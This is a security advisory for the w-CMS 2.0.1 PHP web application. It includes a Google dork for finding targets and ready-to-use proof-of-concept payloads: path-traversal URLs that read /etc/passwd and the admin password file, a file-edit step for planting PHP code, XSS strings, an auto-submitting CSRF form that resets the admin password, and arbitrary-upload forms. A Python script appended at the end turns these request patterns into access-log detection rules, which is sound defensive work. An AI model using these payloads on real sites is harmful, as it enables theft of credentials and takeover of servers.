w-CMS 2.0.1 CSRF / XSS / File Disclosure / Shell Upload
2012-04-07 / 2013-02-05
Credit:
Black-ID
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2012-6522
CWE:
CWE-79
CWE-352
Dork:
intext:"Powered by w-CMS"
CVSS base score:
5/10
Impact subscore:
2.9/10
Exploitability subscore:
10/10
Required access:
Remote
Attack complexity:
Low
Authentication:
Not required
Confidentiality impact:
Partial
Integrity impact:
None
Availability impact:
None
+----------------------------------------------------------------------+
[x] Exploit Title: w-CMS 2.0.1 Multiple Vulnerabilities
[x] Google Dork: intext:"Powered by w-CMS"
[x] Version : 2.0.1
[x] WebSite : http://w-cms.org/
[x] Software Link: http://wcms.googlecode.com/files/wcms-2.01.zip
[x] Author: Black-ID
[x] Tested on: Win Xp/7 Linux Ubuntu 10.04
[x] Platform: Php
[x] Risk : High
+----------------------------------------------------------------------+

PoC/Exploit:

1.# Local File Disclosure [LFD]

~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd

# Admin Pass Disclosure

~ [PoC]Http://[victim]/path/index.php?p=../../password

+----------------------------------------------------------------------+

2.# Local File Edit/Write

~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php

Just Fill The Text Area With Evil Code (Php) & Click Save

+----------------------------------------------------------------------+

3.# Cross Site Scripting (XSS)

~ [PoC]Http://[victim]/path/?p=<script>alert('Dz0')</script>
~ [PoC]Http://[victim]/path/index.php?p=<script>alert('Dz0')</script>

+----------------------------------------------------------------------+

4.# Html Code Injection

~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)

You Can Inject Html Code In The Text Area
Example : <H3>Own3d</H3>

++ You Can Inject Xss Too
Example : <script>alert('Dz0')</script>

+----------------------------------------------------------------------+

5.# Cross Site Request Forgery (CSRF) Admin Change Pass

~ [PoC] Inject This Evil Code In Contact Form

<html>
<head>
<title>Test</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<SCRIPT LANGUAGE="JavaScript"><!--
setTimeout('document.test.submit()',0);
//--></SCRIPT>
</head>
<body>
<form name="test" id="form1" method="post" action="http://localhost/wcms-2.01/admin.php?settings=password"><!-- Target Site -->
  <p>
    <input name="password1" type="text" value="dz0" /><!-- New Password -->
    <input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
  </p>
  <p><input type="submit" name="Change" value="Change" /></p>
</form>
</body>
</html>

+----------------------------------------------------------------------+

6.# Arbitrary File Upload

~ [PoC]Http://[victim]/admin.php

# Add Folder

<form action='Http://[victim]/path/admin.php' method='post'>
<input type='hidden' name='files' value='folders' />
<h2> Update Folders</h2>
<div class='left'> Folder Name</div>
<div class='right'>
<input name='newfolder' value='' /><br />
<input style='width: auto;' class='button' type='submit' value='Add' />
</form>

# Upload File

<form class='P10' action='Http://[victim]/admin.php' method='post' enctype='multipart/form-data'>
<input type='hidden' name='files' value='upload' />
<h2>Upload Files</h2>
<p><b>Folder:</b> <select name='folder'><option value='Dz'>Dz</option></p><p>
<div id='settings'>
<div class='left'> <p>Files</p> </div>
<div class='right'>
<input type='file' name='file[]' class='multi' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' />
<div class='MultiFile-wrap' id='MultiFile5_wrap'>
<input style='position: absolute; top: -3000px;' name='' class='multi MultiFile-applied' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' type='file' />
<div class='MultiFile-list' id='MultiFile5_wrap_list'></div>
<div class='MultiFile-label'>
<input style='width: auto;' class='button' type='submit' value='Upload' />
</div></div></form>

+----------------------------------------------------------------------+
[x] Greetz : Hidden Pain - Liyan Oz - Kedans Dz - Ddos-Dz
    BaC.Dz - Killer-Dz - Cyb3r-DZ - Ev!LsCr!pT_Dz - Th3 Viper
    BLaCk_SPECTRE - Kha&miX - Damane2011 - YaSmouh - ra3ch
[x] Special 10x: Sec4Ever.Com - xDZx Team - Is-Sec.Org
+----------------------------------------------------------------------+
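
Added example (not part of the original advisory or of w-CMS): the request patterns from items 1, 2, 3 and 5 above, written as access-log detection rules in Python. The log lines, the host name cms.example and the /wcms/ path are constructed, and the Referer rule assumes the genuine password form is served by admin.php on the same host.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format fields used here: request line, status, size, Referer.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"')
TRAVERSAL = re.compile(r"\.\.[/\\]")           # ../ or ..\ after decoding
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)  # start of an HTML tag

def classify(line, site_host):
    """Return the advisory items (by name) that one access-log line matches."""
    m = LOG_RE.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    # parse_qs decodes once; the extra unquote exposes double-encoded input (%252e).
    params = {k: [unquote(v) for v in vs] for k, vs in parse_qs(url.query, keep_blank_values=True).items()}
    hits = []
    for value in params.get("p", []):
        if TRAVERSAL.search(value):
            hits.append("file-disclosure")
        if MARKUP.search(value):
            hits.append("xss")
    if url.path.endswith("/admin.php"):
        if any(TRAVERSAL.search(v) for v in params.get("edit", [])):
            hits.append("file-write")
        # Heuristic (assumption): the genuine password form is served by admin.php
        # on the same host, so any other Referer suggests a forged submission.
        ref = urlsplit(m["referer"])
        same_page = ref.hostname == site_host and ref.path.endswith("/admin.php")
        if m["method"] == "POST" and params.get("settings") == ["password"] and not same_page:
            hits.append("csrf-password-change")
    return hits

def scan(lines, site_host):
    """Map 1-based line numbers to findings, skipping clean lines."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := classify(line, site_host))}

# Constructed sample log: documentation IPs, hypothetical host cms.example.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2012:10:00:01 +0000] "GET /wcms/index.php?p=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [07/Apr/2012:10:00:07 +0000] "GET /wcms/?p=..%2F..%2Fpassword HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [07/Apr/2012:10:00:09 +0000] "GET /wcms/index.php?p=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [07/Apr/2012:10:00:12 +0000] "GET /wcms/admin.php?edit=%252e%252e%252fx.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Apr/2012:10:01:30 +0000] "POST /wcms/admin.php?settings=password HTTP/1.1" 302 0 "http://cms.example/wcms/?p=guestbook" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Apr/2012:10:05:02 +0000] "POST /wcms/admin.php?settings=password HTTP/1.1" 302 0 "http://cms.example/wcms/admin.php?settings=password" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG, "cms.example"))
```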
References:
http://wcms.googlecode.com/files/wcms-2.01.zip